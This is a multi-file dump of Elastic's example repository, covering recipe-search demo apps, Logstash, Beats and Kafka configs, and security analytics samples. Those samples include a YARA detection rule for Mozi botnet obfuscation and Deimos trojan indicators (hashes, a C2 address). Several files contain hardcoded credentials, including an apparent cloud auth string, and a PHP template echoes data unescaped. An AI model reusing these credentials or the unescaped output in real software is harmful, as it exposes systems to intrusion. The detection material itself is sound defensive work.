https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/css/recipes.css


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.eot


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.ttf


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/src/main/webapp/fonts/glyphicons-halflings-regular.woff2


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/js/bootstrap-table-zh-CN.min.js:
--------------------------------------------------------------------------------
1 | /*
2 | * bootstrap-table - v1.11.0 - 2016-07-02
3 | * https://github.com/wenzhixin/bootstrap-table
4 | * Copyright (c) 2016 zhixin wen
5 | * Licensed MIT License
6 | */
7 | !function(a){"use strict";a.fn.bootstrapTable.locales["zh-CN"]={formatLoadingMessage:function(){return"正在努力地加载数据中,请稍候……"},formatRecordsPerPage:function(a){return"每页显示 "+a+" 条记录"},formatShowingRows:function(a,b,c){return"显示第 "+a+" 到第 "+b+" 条记录,总共 "+c+" 条记录"},formatSearch:function(){return"搜索"},formatNoMatches:function(){return"没有找到匹配的记录"},formatPaginationSwitch:function(){return"隐藏/显示分页"},formatRefresh:function(){return"刷新"},formatToggle:function(){return"切换"},formatColumns:function(){return"列"},formatExport:function(){return"导出数据"},formatClearFilters:function(){return"清空过滤"}},a.extend(a.fn.bootstrapTable.defaults,a.fn.bootstrapTable.locales["zh-CN"])}(jQuery);


--------------------------------------------------------------------------------
/Search/recipe_search_java/src/main/webapp/js/npm.js:
--------------------------------------------------------------------------------
 1 | // This file is autogenerated via the `commonjs` Grunt task. You can require() this file in a CommonJS environment.
 2 | require('../../js/transition.js')
 3 | require('../../js/alert.js')
 4 | require('../../js/button.js')
 5 | require('../../js/carousel.js')
 6 | require('../../js/collapse.js')
 7 | require('../../js/dropdown.js')
 8 | require('../../js/modal.js')
 9 | require('../../js/tooltip.js')
10 | require('../../js/popover.js')
11 | require('../../js/scrollspy.js')
12 | require('../../js/tab.js')
13 | require('../../js/affix.js')


--------------------------------------------------------------------------------
/Search/recipe_search_java/target/classes/com/elastic/recipe/IndexRecipesApp.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/target/classes/com/elastic/recipe/IndexRecipesApp.class


--------------------------------------------------------------------------------
/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesApp.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesApp.class


--------------------------------------------------------------------------------
/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesServlet.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Search/recipe_search_java/target/classes/com/elastic/recipe/SearchRecipesServlet.class


--------------------------------------------------------------------------------
/Search/recipe_search_php/.gitignore:
--------------------------------------------------------------------------------
1 | vendor/
2 | composer.lock
3 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/composer.json:
--------------------------------------------------------------------------------
1 | {
2 |     "require": {
3 |         "elasticsearch/elasticsearch": "~5.0"
4 |     },
5 |     "autoload": {
6 |         "psr-4": { "RecipeSearch\\": "src/RecipeSearch/" }
7 |     }
8 | }
9 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/public/index.php:
--------------------------------------------------------------------------------
1 | simple.php


--------------------------------------------------------------------------------
/Search/recipe_search_php/public/js/script.js:
--------------------------------------------------------------------------------
 1 | var addBlankItemToList = function(e) {
 2 |   var linkEl = e.target;
 3 |   var newEl = $(linkEl.previousElementSibling).clone();
 4 |   newEl.children(0).children(0).children(0).val("");
 5 |   newEl.insertBefore(linkEl);
 6 | }
 7 | 
 8 | $( "#add-ingredient" ).on("click", addBlankItemToList);
 9 | $( "#add-step" ).on("click", addBlankItemToList);
10 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/public/results.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | if (count($results) > 0) {
 3 | ?>
 4 | <table class="table table-striped">
 5 | <thead>
 6 |   <th>Title</th>
 7 |   <th>Description</th>
 8 | 	<th>Preparation time (minutes)</th>
 9 |   <th>Cooking time (minutes)</th>
10 | </thead>
11 | <?php
12 |     error_reporting(E_ALL ^ E_NOTICE);
13 | 
14 |     foreach ($results as $result) {
15 |         $recipe = $result['_source'];
16 | ?>
17 | <tr>
18 |   <td><a href="/view.php?id=<?php echo $result['_id']; ?>"><?php echo $recipe['title']; ?></a></td>
19 |   <td><?php echo $recipe['description']; ?></td>
20 | 	<td><?php echo $recipe['prep_time_min']; ?></td>
21 |   <td><?php echo $recipe['cook_time_min']; ?></td>
22 | </tr>
23 | <?php
24 |     } // END foreach loop over results
25 | ?>
26 | </table>
27 | <?php
28 | } // END if there are search results
29 | 
30 | else {
31 | ?>
32 | <p>Sorry, no recipes found :( Would you like to <a href="/add.php">add</a> one?</p>
33 | <?php
34 | 
35 | } // END elsif there are no search results
36 | 
37 | ?>
38 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/src/RecipeSearch/Constants.php:
--------------------------------------------------------------------------------
1 | <?php
2 | 
3 | namespace RecipeSearch;
4 | 
5 | class Constants {
6 |     const ES_INDEX = 'food';
7 |     const ES_TYPE = 'recipe';
8 | }
9 | 


--------------------------------------------------------------------------------
/Search/recipe_search_php/src/RecipeSearch/Util.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | namespace RecipeSearch;
 4 | 
 5 | class Util {
 6 |     public static function recipeTitleToId($recipeTitle)
 7 |     {
 8 |         return preg_replace('/[^\w]+/', '-', strtolower($recipeTitle));
 9 |     }
10 | 
11 |     public static function recipeTagsToArray($recipeTags)
12 |     {
13 |         $tags = [];
14 |         foreach (explode(",", $recipeTags) as $tag) {
15 |           $tags[] = trim($tag);
16 |         }
17 |         return $tags;
18 |     }
19 | }
20 | 


--------------------------------------------------------------------------------
/Security Analytics/ACSC2020-008_IOCs/images/siem-rules.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/ACSC2020-008_IOCs/images/siem-rules.png


--------------------------------------------------------------------------------
/Security Analytics/SIEM-at-Home/beats-configs/filebeat/filebeat-syslog-input.yml:
--------------------------------------------------------------------------------
 1 | ###################### SIEM at Home - Filebeat Syslog Input Configuration Example #########################
 2 | # This file is an example configuration file highlighting only the most common
 3 | # options. The filebeat.reference.yml file from the same directory contains all the
 4 | # supported options with more comments. You can use it as a reference.
 5 | #
 6 | # You can find the full configuration reference here:
 7 | # https://www.elastic.co/guide/en/beats/filebeat/index.html
 8 | #=========================== Filebeat inputs =============================
 9 | filebeat.inputs:
10 | # Configure Filebeat to receive syslog traffic
11 | - type: syslog
12 |   enabled: true
13 |   protocol.udp:
14 |     host: "10.101.101.10:5140" # IP:Port of host receiving syslog traffic
15 | 


--------------------------------------------------------------------------------
/Security Analytics/SIEM-examples/README.md:
--------------------------------------------------------------------------------
1 | # SIEM examples
2 | 
3 | SIEM examples, such as scripts and APIs:
4 | 
5 | [**Detections API Postman collection**](Detections-API/Kibana.postman_collection.v2.json)
6 | 
7 | [**Ingest pipeline for Packetbeat adding ASN details**](Packetbeat/geoip-info.json) (an alternative to the pipeline in the [docs](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-geoip.html#packetbeat-configuring-geoip))
8 | 


--------------------------------------------------------------------------------
/Security Analytics/auditd_analysis/example_2/auditd.cef.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/auditd_analysis/example_2/auditd.cef.tar.gz


--------------------------------------------------------------------------------
/Security Analytics/auditd_analysis/example_2/data_feed.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "datafeed_id": "datafeed-unusual_process",
 3 |   "job_id": "unusual_process",
 4 |   "query": {
 5 |     "term": {
 6 |       "deviceEventCategory": {
 7 |         "value": "EXECVE"
 8 |       }
 9 |     }
10 |   },
11 |   "query_delay": "60s",
12 |   "frequency": "300s",
13 |   "scroll_size": 1000,
14 |   "indexes": [
15 |     "cef-auditd-*"
16 |   ],
17 |   "types": [
18 |     "doc"
19 |   ]
20 | }


--------------------------------------------------------------------------------
/Security Analytics/auditd_analysis/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.4.0
2 | urllib3==1.21.1
3 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/kafka/broker-list.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | 
3 | CONTAINERS=$(docker ps | grep 9092 | awk '{print $1}')
4 | BROKERS=$(for CONTAINER in $CONTAINERS; do docker port $CONTAINER 9092 | sed -e "s/0.0.0.0:/$HOST_IP:/g"; done)
5 | echo $BROKERS | sed -e 's/ /,/g'
6 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/kafka/download-kafka.sh:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | 
3 | mirror=$(curl --stderr /dev/null https://www.apache.org/dyn/closer.cgi\?as_json\=1 | jq -r '.preferred')
4 | url="${mirror}kafka/${KAFKA_VERSION}/kafka_${SCALA_VERSION}-${KAFKA_VERSION}.tgz"
5 | wget -q "${url}" -O "/tmp/kafka_${SCALA_VERSION}-${KAFKA_VERSION}.tgz"
6 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/kafka/start-kafka-shell.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -e HOST_IP=$1 -e ZK=$2 -i -t wurstmeister/kafka /bin/bash
3 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.elastic.co/logstash/logstash:5.6.0
2 | RUN rm -f /usr/share/logstash/pipeline/logstash.conf
3 | RUN rm -f /usr/share/logstash/config/logstash.yml
4 | ADD config/logstash.yml /usr/share/logstash/config/logstash.yml
5 | CMD /usr/share/logstash/bin/logstash --modules arcsight --setup


--------------------------------------------------------------------------------
/Security Analytics/cef_with_kafka/logstash/config/logstash.yml:
--------------------------------------------------------------------------------
 1 | modules:
 2 |   - name: arcsight
 3 |     var.input.eventbroker.bootstrap_servers: "kafka:9092"
 4 |     var.input.eventbroker.topics: "eb-cef"
 5 |     var.elasticsearch.hosts: "elasticsearch:9200"
 6 |     var.elasticsearch.username: "elastic"
 7 |     var.elasticsearch.password: "changeme"
 8 |     var.kibana.host: "kibana:5601"
 9 |     var.kibana.username: "elastic"
10 |     var.kibana.password: "changeme"
11 | 
12 | xpack.monitoring.elasticsearch.url: "http://elasticsearch:9200"
13 | 
14 | 


--------------------------------------------------------------------------------
/Security Analytics/cef_with_logstash/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   kibana:
 4 |     image: docker.elastic.co/kibana/kibana:5.6.0
 5 |     links:
 6 |       - elasticsearch
 7 |     ports:
 8 |       - 5601:5601
 9 | 
10 |   elasticsearch:
11 |     image: docker.elastic.co/elasticsearch/elasticsearch:5.6.0
12 |     cap_add:
13 |       - IPC_LOCK
14 |     volumes:
15 |       - esdata1:/usr/share/elasticsearch/data
16 |     ports:
17 |       - 9200:9200
18 |       
19 |   logstash:
20 |     build: logstash
21 |     links:
22 |       - elasticsearch
23 |       - kibana
24 |     ports:
25 |       - 5000:5000
26 |       - 9600:9600
27 | 
28 | volumes:
29 |   esdata1:
30 |     driver: local
31 |         


--------------------------------------------------------------------------------
/Security Analytics/cef_with_logstash/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.elastic.co/logstash/logstash:5.6.0
2 | RUN rm -f /usr/share/logstash/pipeline/logstash.conf
3 | RUN rm -f /usr/share/logstash/config/logstash.yml
4 | ADD config/logstash.yml /usr/share/logstash/config/logstash.yml
5 | CMD /usr/share/logstash/bin/logstash --modules arcsight --setup


--------------------------------------------------------------------------------
/Security Analytics/cef_with_logstash/logstash/config/logstash.yml:
--------------------------------------------------------------------------------
 1 | modules:
 2 |   - name: arcsight
 3 |     var.inputs: "smartconnector"
 4 |     var.input.smartconnector.port: "5000"
 5 |     var.elasticsearch.hosts: "elasticsearch:9200"
 6 |     var.elasticsearch.username: "elastic"
 7 |     var.elasticsearch.password: "changeme"
 8 |     var.kibana.host: "kibana:5601"
 9 |     var.kibana.username: "elastic"
10 |     var.kibana.password: "changeme"
11 | 
12 | 
13 | 
14 | xpack.monitoring.elasticsearch.url: "http://elasticsearch:9200"
15 | 
16 | 


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/.gitignore:
--------------------------------------------------------------------------------
1 | *.tgz
2 | *.zip
3 | dns-tunnel-iodine-timeshifted.pcap
4 | 
5 | elasticsearch/
6 | packetbeat/
7 | 


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/dns-tunnel-iodine.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/dns_tunnel_detection/dns-tunnel-iodine.pcap


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/dns_transform.painless:
--------------------------------------------------------------------------------
 1 | def alerts = ctx.payload.aggregations.by_domain.buckets.stream().collect(Collectors.toMap(p->p.key,item->[
 2 |         "total_requests" : item.doc_count,
 3 |         "unique_hostnames" : item.unique_hostnames.value,
 4 |         "total_bytes_in" : item.total_bytes_in.value,
 5 |         "total_bytes_out" : item.total_bytes_out.value,
 6 |         "total_bytes" : item.total_bytes_in.value + item.total_bytes_out.value
 7 | ]));
 8 | 
 9 | return ["alerts":alerts];
10 | 


--------------------------------------------------------------------------------
/Security Analytics/dns_tunnel_detection/packetbeat.yml:
--------------------------------------------------------------------------------
 1 | # /etc/packetbeat/packetbeat.yml
 2 | packetbeat.interfaces.device: en0
 3 | 
 4 | packetbeat.protocols.dns:
 5 |   ports: [53]
 6 |   include_authorities: true
 7 |   include_additionals: true
 8 | 
 9 | output.elasticsearch:
10 |   hosts: ["localhost:9200"]
11 | 


--------------------------------------------------------------------------------
/Security Analytics/malware_analysis/images/kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Security Analytics/malware_analysis/images/kibana.png


--------------------------------------------------------------------------------
/Security Analytics/ssh_analysis/run_watch.sh:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env bash
 2 | if [ -z "$1" ] ; then
 3 |     echo "No watch name supplied e.g. ./load_watch.sh successful_login_external"
 4 |     exit 1
 5 | fi
 6 | 
 7 | username=elastic
 8 | if [ "$2" ] ; then
 9 |   username=$2
10 | fi
11 | 
12 | password=changeme
13 | if [ "$3" ] ; then
14 |   password=$3
15 | fi
16 | 
17 | echo "Loading $1 watch "
18 | 
19 | curl -s -o /dev/null -X DELETE localhost:9200/_xpack/watcher/watch/$1 -u $username:$password
20 | es_response=$(curl -H "Content-Type: application/json" --w "%{http_code}" -s -o /dev/null -X POST localhost:9200/_xpack/watcher/watch/_execute -u $username:$password -d @$1.json)
21 | if [ 0 -eq $? ] && [ $es_response = "200" ]; then
22 | echo "Loading $1 watch...OK"
23 | exit 0
24 | else
25 | echo "Loading $1 watch...FAILED"
26 | exit 1
27 | fi


--------------------------------------------------------------------------------
/Speed Layer/README.md:
--------------------------------------------------------------------------------
 1 | # Speed Layers with Elastic
 2 | These are some resources to explore Elastic as a Speed Layer (a fast, scalable search and analytics layer on top of existing legacy data systems).
 3 | 
 4 | `logstash_batch_export.conf`
 5 | An example of batch loading of records from MySQL to Elasticsearch
 6 | 
 7 | `dev_console.json`
 8 | A lab for Kibana's Dev Console
 9 | 
10 | `kibana_objects.ndjson`
11 | Importable Kibana objects (dashboard, visualizations, index pattern)
12 | 
13 | Everything was made in Elastic Stack 7.3.
14 | 


--------------------------------------------------------------------------------
/Speed Layer/logstash_batch_export.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   jdbc {
 3 |     jdbc_driver_library => "mysql-connector-java-5.1.48-bin.jar"
 4 |     jdbc_driver_class => "com.mysql.jdbc.Driver"
 5 |     jdbc_connection_string => ${MYSQL_URI}
 6 |     jdbc_user => ${MYSQL_USER}
 7 |     jdbc_password => ${MYSQL_PASS}
 8 |     statement => "SELECT * FROM transactions_flat"
 9 |   }
10 | }
11 | 
12 | output {
13 |   elasticsearch {
14 |     hosts => [${ES_URL}]
15 |     index => "transactions_dirty"
16 |     user => speedlayer
17 |     password => ${ES_PASS}
18 |   }
19 | }
20 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/DockerDashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/beats-k8s-send-anywhere/DockerDashboard.png


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTICSEARCH_HOSTS:
--------------------------------------------------------------------------------
1 | ["http://elasticsearch-master.default.svc.cluster.local:9200"]
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTICSEARCH_PASSWORD:
--------------------------------------------------------------------------------
1 | changeme
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTICSEARCH_USERNAME:
--------------------------------------------------------------------------------
1 | elastic
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTIC_CLOUD_AUTH:
--------------------------------------------------------------------------------
1 | elastic:VFaTnqar2nDho2Wmb7rm9TG4
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/ELASTIC_CLOUD_ID:
--------------------------------------------------------------------------------
1 | k8s:ZXVyb3BlLXdlc3QxLmdjcC5jbG91ZC5lcy5pbyRhMzlmM2MwNWQ2Mjk0YzdiODQzZDA2YWU2NDJhZWM2MyQ5MzEwOTJjMTc5YWQ0YzQ5OThlN2U5MjAwYTg4NTIzZQ==
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/KIBANA_HOST:
--------------------------------------------------------------------------------
1 | "kibana-kibana.default.svc.cluster.local:5601"
2 | 


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/scaling-discover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/beats-k8s-send-anywhere/scaling-discover.png


--------------------------------------------------------------------------------
/beats-k8s-send-anywhere/scaling-up.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/beats-k8s-send-anywhere/scaling-up.png


--------------------------------------------------------------------------------
/blog/README.MD:
--------------------------------------------------------------------------------
 1 | This folder is for holding example code being used in blogs (so people don't have to use their personal repo).
 2 | 
 3 | When creating a new folder, name it the URL of your blog post (just the slug/path, not the full URL). For example:
 4 |  
 5 | - **Blog URL:** `https://www.elastic.co/blog/elastic-machine-learning-finds-anomalies-fast`
 6 | - **GH Folder:** `elastic-machine-learning-finds-anomalies-fast`
 7 | 
 8 | Be sure to include a README.MD in your folder that includes:
 9 | - Full URL
10 | - Blog title
11 | - Blog summary/abstract
12 | 
13 | **Note:** If the URL gets changed before publish date, please update the folder name. If this isn't possible, please update the README.MD of your code so people know what the correct URL is.
14 | 


--------------------------------------------------------------------------------
/blog/climbing-the-pyramid-with-celestial-themed-malware/README.MD:
--------------------------------------------------------------------------------
 1 | # Climbing the Pyramid with Celestial-themed Malware
 2 | 
 3 | ## Abstract
 4 | The Deimos trojan (AKA Jupyter Infostealer, SolarMarker) is a malware tool first reported in 2020, but has been in active development and employs advanced defensive countermeasures used to frustrate analysis. This post details the campaign TTPs through the malware indicators.
 5 | 
 6 | ## URL
 7 | 
 8 | ## Artifacts
 9 | Artifacts and code snippets from the blog post.
10 | 
11 | | Artifact | Description | Note |  
12 | | - | - | - |
13 | | f268491d2f7e9ab562a239ec56c4b38d669a7bd88181efb0bd89e450c68dd421 | Lure file | - |  
14 | | af1e952b5b02ca06497e2050bd1ce8d17b9793fdb791473bdae5d994056cb21f | Malware installer | - |  
15 | | d6e1c6a30356009c62bc2aa24f49674a7f492e5a34403344bfdd248656e20a54 | .NET DLL file | - |  
16 | | 216[.]230[.]232[.]134 | Command and control | - |  
17 | | [Deimos YARA Rule](windows_trojan_deimos.yar) | YARA rule to identify the Deimos DLL file. | - |  
18 | 


--------------------------------------------------------------------------------
/blog/mozin-about/mozi-obfuscation-technique.yara:
--------------------------------------------------------------------------------
 1 | rule Mozi_Obfuscation_Technique
 2 | {
 3 |   meta:
 4 |     author =  "Elastic Security, Lars Wallenborn (@larsborn)"
 5 |     description = "Detects obfuscation technique used by Mozi botnet."
 6 |   strings:
 7 |     $a = { 55 50 58 21
 8 |            [4]
 9 |            00 00 00 00
10 |            00 00 00 00
11 |            00 00 00 00 }
12 |   condition:
13 |     all of them
14 | }
15 | 


--------------------------------------------------------------------------------
/canvas/ama/images/existing-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/ama/images/existing-workpads.png


--------------------------------------------------------------------------------
/canvas/ama/images/no-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/ama/images/no-workpads.png


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/automations/elasticon-automations.yaml:
--------------------------------------------------------------------------------
 1 | - id: bulk_quad_detector
 2 |   alias: Bulk Quad Detector
 3 | #  hide_entity: true
 4 |   trigger:
 5 |     platform: event
 6 |     event_type: zwave.scene_activated
 7 |     # event_data:
 8 |     #   entity_id: zwave.quad1
 9 |   action:
10 |     - service: shell_command.quad_button_handler
11 |       data_template:
12 |         scene_id: "{{ trigger.event.data.scene_id }}"
13 |         scene_data: "{{ trigger.event.data.scene_data }}"
14 |         entity_id: "{{ trigger.event.data.entity_id }}"
15 |   
16 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/customize.yaml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/elasticon-home-assistant/customize.yaml


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/groups.yaml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/elasticon-home-assistant/groups.yaml


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/load-test.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | maxDelay=${1:-60}
 4 | 
 5 | function random
 6 | {
 7 |     local from=$1
 8 |     local to=$2
 9 | 
10 |     echo $(( ((RANDOM<<15)|RANDOM) % ($to - $from + 1) + $from))
11 | }
12 | 
13 | while [ 1 ]
14 | do
15 |     quad=$(random 1 4)
16 |     button=$(random 1 4)
17 |     delay=$(random 2 $maxDelay)
18 | 
19 |     echo "coffeePressHandler.sh  "zwave.quad${quad}" "$button" 0 delay=$delay"
20 |     ./coffeePressHandler.sh  "zwave.quad${quad}" "$button" 0
21 |     sleep $delay
22 | done
23 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/scripts.yaml:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/elasticon-home-assistant/scripts.yaml


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/shell_commands/elasticon-shell_commands.yaml:
--------------------------------------------------------------------------------
1 | quad_button_handler: '/home/homeassistant/elasticon-home-assistant/coffeePressHandler.sh "{{ entity_id }}"  "{{ scene_id }}" "{{ scene_data }}"'
2 | 
3 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/elasticon-home-assistant/zwscene.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8" ?>
2 | <Scenes xmlns="http://code.google.com/p/open-zwave/" version="1" />
3 | 


--------------------------------------------------------------------------------
/canvas/elasticoffee/images/existing-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/images/existing-workpads.png


--------------------------------------------------------------------------------
/canvas/elasticoffee/images/no-workpads.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/canvas/elasticoffee/images/no-workpads.png


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ECK-obs-infrastructure.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/k8s-observability-with-eck/ECK-obs-infrastructure.png


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ELASTICSEARCH_HOSTS:
--------------------------------------------------------------------------------
1 | ["https://elasticsearch-sample-es.default.svc.cluster.local:9200"]
2 | 


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ELASTICSEARCH_PASSWORD:
--------------------------------------------------------------------------------
1 | abcdefghijjklmnopqrstuvw
2 | 


--------------------------------------------------------------------------------
/k8s-observability-with-eck/ELASTICSEARCH_USERNAME:
--------------------------------------------------------------------------------
1 | elastic
2 | 


--------------------------------------------------------------------------------
/k8s-observability-with-eck/KIBANA_HOST:
--------------------------------------------------------------------------------
1 | "http://kibana-sample-kibana.default.svc.cluster.local:5601"
2 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/CLOUD_ID:
--------------------------------------------------------------------------------
1 | put cloud ID from cloud.elastic.co here. Make sure there is only one line in the file with only the password and no whitespace (replace this line).
2 | 
3 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/ELASTIC_PASSWORD:
--------------------------------------------------------------------------------
1 | Put password for elastic user here.  Make sure there is only one line in the file with only the password and no whitespace (replace this line).
2 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/download.txt:
--------------------------------------------------------------------------------
 1 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/CLOUD_ID
 2 | 
 3 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/ELASTIC_PASSWORD
 4 | 
 5 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/README.md
 6 | 
 7 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/guestbook.yaml
 8 | 
 9 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/metricbeat-clusterrolebinding.yaml
10 | 
11 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/metricbeat-kube-state-and-prometheus-server.yaml
12 | 
13 | wget https://raw.githubusercontent.com/elastic/examples/master/scraping-prometheus-k8s-with-metricbeat/metricbeat-prometheus-auto-discover.yaml
14 | 


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/001-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/001-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/002-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/002-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/003-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/003-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/004-kibana.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/scraping-prometheus-k8s-with-metricbeat/images/004-kibana.png


--------------------------------------------------------------------------------
/scraping-prometheus-k8s-with-metricbeat/images/005-kibana.png:
--------------------------------------------------------------------------------
